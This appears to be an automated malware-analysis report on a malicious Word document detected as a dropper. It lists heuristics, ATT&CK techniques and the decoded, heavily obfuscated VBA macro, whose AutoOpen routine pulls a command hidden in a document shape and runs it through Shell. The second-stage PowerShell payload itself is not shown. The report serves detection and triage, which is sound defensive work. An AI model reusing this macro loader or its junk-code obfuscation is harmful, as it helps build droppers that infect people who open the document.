MALICIOUS
292
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059.001 PowerShell
T1204.002 Malicious File
The sample contains VBA macros with an autoopen function that triggers a Shell() call. This call executes cmd.exe with arguments that appear to construct and execute a PowerShell command. The PowerShell command is obfuscated but likely responsible for downloading and executing a second-stage payload from a remote location, as indicated by the embedded URL and the ClamAV detection name 'Doc.Dropper.Agent'.
Heuristics 10
-
ClamAV: Doc.Dropper.Agent-6830924-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6830924-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
_ .Shell(zVsVoHBaFPJ, qZhSoLXwd), oqmHUiq) jCucUFwTwawURwcBlANBW = (64603473 + Round(AQPjOsatYovwAmIdC) * 252979340 - tOaQpZnSrzoDMZntL + (VibYjafVBcPcWKO / Tan(PzazZKbZiujljXM))) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Customizable = True Sub autoopen() bnqnq -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5183 bytes |
SHA-256: 5385865d12234347b8a5da60c5bbaa16d67d0befb1fa89bea3e7cebf058fc5dc |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
153 of 182 identifiers look randomly generated (e.g. 'LJQujEFAUdFBllzoinJfBfQP') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "RStCinJwZM" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub autoopen() bnqnq End Sub Attribute VB_Name = "fltlWwRJVIiFIr" Function bnqnq() On Error Resume Next zjiinYLhwllDjGA = (181432626 + Round(uCLdacmOGqMTXwsbuvDfuRv) * 23104012 - IDJjLfbwhnwbbZE + (QjhzNZotcmLzwwcGIXRYcfuL / Tan(VqJuzSWwjdlNEsjOQGZUi))) iKrTEHfTllWNsj = 207388330 UdmFiAitGiMBNaaSIuGBdZs = (55016008 + Round(dZNRYRpjIZQziHzidqIi) * 234516082 - WkAEszpQvkiYAaQciRXRF + (KSamITAikazvCc / Tan(TYqtrifVJGXRAIqKR))) WahiFqWQNzEbFYoLPsjY = 93629754 NQiGZbjvwGZfzcs = (7951182 + Round(fhattQLaitfEPoow) * 47256574 - jNjaYCWhwFArlazDusuO + (zSjviAqjRliqzJocEJ / Tan(WMSGamHFHMuwBsKjuDf))) BfBjURBnRJapjWrHhMFIbv = 232481328 aPPllqhmuXYDwZUAwSITL = (1117982 + Round(JVzFAopzbALOMOK) * 65207245 - MwsjaOcfXmclUUaaHGQnkhz + (ZzCnKIlmIQHOHbi / Tan(UZcBNMHfkoEIuWH))) wmGdLpUPAqcDNLSfYJSL = 29370576 GkhoBpLDmYsUvJjdipWSkB = (200278905 + Round(idDhKdBLsjUHJKc) * 41656692 - ZiDubhpRCEcQpDEFbKXmis + (WjcOoYTTMQdKSaKD / Tan(NQIYZvCdQBhAFTKjZjOzSBsi))) QALsmfQGaYOklzlZlYXmT = 44785202 zHljVJvqRMpMFB = (49424667 + Round(WwohoBCdHdaZvT) * 105533493 - YwPRuPkFqOcNdWc + (BrNnkUQwEIcsjWvzwknGl / Tan(GGMjrZYpzkBpXEGcUDiRNm))) sWUTfQsiVzLkGbAdqaOIrr = 299404949 qiBtAVacBWhEKSizjCdWzr = (329437765 + Round(llvqhjGlqunrfiUaqh) * 12319430 - hoaBYzbohbowkjIPZj + (SQwOPfmSBhCjSpbozKuSiHR / Tan(PGoHwaEBGnjGlZ))) WljaHiuWIIrLFfRL = 68580705 RiZLfMMcjkDjLJzwtaphfw = (340555788 + Round(cKSauNFSvUcvbTaAnCvkmWc) * 203923518 - GOJUwITfjjVumhSflkrhCXa + (pudCPGGhnjozww / Tan(LJQujEFAUdFBllzoinJfBfQP))) coHDtSinkfYldqvjtIY = 67547064 IIkiRcBzjWMaCGQuibG = (160785397 + Round(SvjjozfzHHFAwFzLwrCiF) * 111492714 - CaNJiGRTUYppNBwdiW + (cPGaDATifjDpbBZhJaowspnl / Tan(JQkKzOYMHoFvAKIPXmj))) iNnnUpCpZEncVzuki = 163169574 Set wpuGLn = RStCinJwZM.Shapes(FZCEz + "TnCpdnC" + vIWsFV) MqJbIDwnaqlKKHmDEDjX = (258433863 + Round(SlRGoqjIUScNQABn) * 211775080 - wCqBOaIwqGuXGFtBYY + (BOGERVThzqlBQXMa / Tan(UQWrzqzcNwLWTPcddiGqw))) futLIEEiAufIjHBSDYG = 180807017 CPlsVwzofpLjGH = (49301192 + Round(JMwGjWaGzqPiVVdULWcZDLF) * 320486877 - SObjidAEwVFfhSfoi + (fhSSKLqYjiiowHBpQIzXUNO / Tan(YAYpdEzkZRZPzADPtGt))) VIWzisBXpGYSTsuKnB = 309195651 Set zjsATH = wpuGLn.TextFrame RqKCTbsSStnwbSXzQb = (196643864 + Round(PEBzssqbwozwCqIsZTBftP) * 95727281 - IjPoSvFJsjFMoLKblQVivo + (lJfZwawvzqNqIcBJBjoFSkw / Tan(OJZtdtksTqiinV))) jtnFWbUCwkHUuGi = 175535712 Set zzbKWN = zjsATH.ContainingRange lnUCWvWnzRjZwzjQ = (237812479 + Round(CVGKWEVXKiJWwWbwjmUjOU) * 46309413 - LroJrXUAVLhiFaQQjzkr + (dVJwANtvAXiOdzfPMjmK / Tan(AkpwqJVEDPjPwhV))) LrJaFUnzQcblATSzhVcl = 134468745 zVsVoHBaFPJ = zzbKWN + RJkBock + YqzIw + zqjOhjE + lhdFkKJh + OXiAR + OMNRBMY + zniVvW + bQSdU + HXipISpP BhABizJfIwUKdbivQpJw = (152854576 + Round(JJzYEdwhZhFYhdcKLG) * 63439508 - nblSAhYOizZfGjXrEKsfh + (WmFEtBSFdDonhiXfXWF / Tan(wcHZRBFlGANdCMEwMvnWw))) TVqTzpTYmVazbtffnswj = 333470739 nPaGdhbYdJUnUaHibwJ = (135911943 + Round(NIwYwKldWdNlcpjFW) * 210999175 - zrSOhtATmEYRzRLaHchjW + (vHjGCslYYFQaXXvtRiwqzZ / Tan(LOTQPbcozMGwKiarHiNfSAYu))) fOKCjfrWJUsjbWwwQROQbk = 72541879 OzHjjTFlUoHXpSGDP = (144285357 + Round(YbDELtiaZkSDvBN) * 184509727 - XBvroVpwjnQRntZVappK + (wnFsfACkMVbqafOaNkFOFbG / Tan(JmrshUMYRlbOqzIU))) NXSoaNOKvMFkwpUjsjtJKC = 287405869 zzCPVZEzpvSVlTar = (230266769 + Round(jfiLYpSGtbwZBIs) * 90803318 - WmqIZcAHwiLDkBBTMFqjoa + (zOjdBPtJcXfEFszK / Tan(dDaLGDIZuGpDCi))) vZstswzsEUjfFw = 317017477 PEswTlwMZzjYin = (219674807 + Round(SXaJdoAwqoiOtfzuwIVwjNqa) * 2038329 - aVQrOjTWOFqZXbDtG + (HjTtzmcVSkSEjAJNOfiw / Tan(wvWQuEWlttnHLSQwjVi))) sNjDKYpQJMYLIFIoz = 192977168 Const qZhSoLXwd = 0 NriKqCzWAjCNbYLcCa = (208053513 + Round(RvtDOhIMNiAlawvRYp) * 239185355 - lrTfmIKDsYCSNnDSw + (vJtkIVfRnfctENqQlab / Tan(QGWFUpciXntdTzta))) AiwzVVfbwUobzCdqlK = 272920417 ZqwbWaEBAJZkOPKDVNwl = (258940347 + Round(KzplYtVtdwXNRwj) * 299510518 - zzkEffwWSscCjGis + (fzmlBLjGjbNAzMTcD / Tan(oCCiTqOFAtruroUzSmGYvmEz))) ElVUjIafHuqOAdwWwKmPljZj = 332190777 XPEwJvzEqSPVLsTR = (187951437 + Round(BbXLTQwCwGVvXTdZ) * 70099477 - zqXnQBLIFXQfuBjqPK + (MwnAHwtivvvsmhwRmpNLWz / Tan(LYmQMTLhETjwbMqP))) XSQNJfdwzkzBBwTNlcbVhj = 102750014 aiNOSjVhpDnwfWjfRwBCzj = (248338509 + Round(EmENEZKzGAIjjsXWLScDm) * 106792427 - IUwLLOcrrwfKjbHcPtoriNAw + (afqiHivnpwsHNzkiJRj / Tan(hruDpMKwYSuTwn))) jlMjOjWrfPVCtDNVvRwqi = 241887088 ZYXcdWjTAJrWDwQ = (152651612 + Round(QfvIZYwUvtTGhiCHV) * 166907946 - mAWjfbJzzVTOlkIczSwA + (bHhdQNSapOiYkk / Tan(uwPjQZzzbihVZFCpW))) fLsoCOOqYHGlpBAshAC = 117905583 uYzPWBYJ = Array(OBswhVS, AOoUKQ, KzzCCwCww, Interaction _ _ _ _ _ _ _ _ .Shell(zVsVoHBaFPJ, qZhSoLXwd), oqmHUiq) jCucUFwTwawURwcBlANBW = (64603473 + Round(AQPjOsatYovwAmIdC) * 252979340 - tOaQpZnSrzoDMZntL + (VibYjafVBcPcWKO / Tan(PzazZKbZiujljXM))) zYhEpViAkTXLCOddoGJnTLf = 73034815 End Function |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.